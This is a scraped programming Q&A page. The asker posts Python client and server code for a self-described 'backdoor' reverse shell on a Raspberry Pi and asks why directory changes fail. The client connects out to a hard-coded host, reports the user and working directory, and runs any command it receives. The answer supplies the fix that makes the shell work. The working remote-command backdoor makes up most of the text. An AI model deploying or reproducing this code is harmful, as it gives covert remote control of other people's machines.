Home > Blockchain >  can't change directory using python sockets
can't change directory using python sockets

Time:06-18

I am building 'backdoor' for my raspberry. so I have problem, after creating interactive shell, I can't change dir.

I edited my original code to make it short. I am trying to resolve this problem around 2-3 hours.

python3 - cd is not working in reverse shell - Not Working

Backdoor Shell doesn't allow me to change Directory - Not Working

Client:

import socket, json
import os
import subprocess
import sys

SERVER_HOST = '192.168.100.8'
SERVER_PORT = 4343
BUFFER_SIZE = 1024 * 128
SEPARATOR = "<sep>"


s = socket.socket()
s.connect((SERVER_HOST, SERVER_PORT))

snd = []

data = json.dumps({"cwd": os.getcwd(), "usr": os.getlogin()})
s.send(data.encode())

while True:
    command = s.recv(BUFFER_SIZE).decode()
    if command == 'shell':
        while True:
            command = s.recv(BUFFER_SIZE).decode()

            if command.lower() == "exit":
                break
            if command.startswith("cd "):
                try:
                    os.chdir(f'{os.getcwd()}/{str(command[3:])}')
                except FileNotFoundError as e:
                    output = str(e)
                else:
                    output = ""
            else:
                output = subprocess.getoutput(command)
            cwd = os.getcwd()
            message = f"{output}{SEPARATOR}{cwd}"
            s.send(message.encode())
            if command == 'exit':
                break
    else:
        if command.lower() == "exit":
            break
        else:
            output = subprocess.getoutput(command)
        cwd = os.getcwd()
        message = f"{output}{SEPARATOR}{cwd}"
        s.send(message.encode())
s.close()

Server:

import socket,json
import os

SERVER_HOST = "192.168.100.8"
SERVER_PORT = 4343
BUFFER_SIZE = 1024 * 128
SEPARATOR = "<sep>"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((SERVER_HOST, SERVER_PORT))
s.listen()

while True:
    client_socket, client_address = s.accept()

    data = json.loads(client_socket.recv(BUFFER_SIZE).decode())
    while True:
        print("TYPE SHELL")
        tmp = input(f"[*] Enter command: ")
        if tmp.lower() == 'shell':
                print("[*] Opening interactive shell")
                command = input(f"{data['cwd']} $: ")
                while command != 'exit':
                    if not command.strip():
                        continue
                    client_socket.send(command.encode())
                    output = client_socket.recv(BUFFER_SIZE).decode()
                    results, cwd = output.split(SEPARATOR)
                    print(results)
                    command = input(f"{data['cwd']} $: ")
                print('[!] Closing interactive shell')

This is what I see in the shell:

/home/pi $: is
1
Bookshelf 
client.py 
Desktop
Documents 
Downloads 
Music
Pictures 
Public
rm.sh
Templates 
Videos
/home/pi $: cd 1

/home/pi $: pwd
/home/pi
/home/pi $: mkdir 2 && cd 2 && touch 1 && ls && pwd 
1
/home/pi/2
/home/pi $:

CodePudding user response:

The server needs to send the shell command to the client when you start the reverse shell. Otherwise, the client won't go into the inner while loop that contains the code that looks for the cd command.

So add the line:

                client_socket.send("shell".encode())

before

                print("[*] Opening interactive shell")

Page link:https//www.codepudding.com/Blockchain/446144.html

Prev:Define a function that is a derivative of a function
Next:How can we delete multiple documents at once in elastic search that belongs to different indexes?
  • Related

About Us:  Contact Us      Terms of Service       Privacy Policy

Copyright © 2010-2023,Powered By CodePudding